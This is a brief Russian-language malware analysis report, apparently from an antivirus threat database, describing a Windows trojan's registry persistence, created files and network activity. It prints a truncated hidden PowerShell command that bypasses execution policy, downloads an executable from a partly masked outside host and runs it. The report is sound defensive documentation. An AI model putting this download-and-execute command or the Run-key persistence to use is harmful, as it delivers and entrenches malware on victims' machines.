Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\] 'solu' = '%APPDATA%\solu\solu.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://ho##c.org/ot/solut.exe как %temp+%\solute.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ho##c.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Appli...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\solute.exe
- %APPDATA%\solu\solu.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://ho##c.org/ot/solut.exe
UDP
- DNS ASK ho##c.org
- DNS ASK so####on.myddns.me
Другое
Создает и запускает на исполнение
- '%TEMP%\solute.exe'
- '%APPDATA%\solu\solu.exe'
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ho##c.org/ot/solut.exe',$env:Temp+'\solute.exe');(New-Object -com Shell.Appli...' (со скрытым окном)
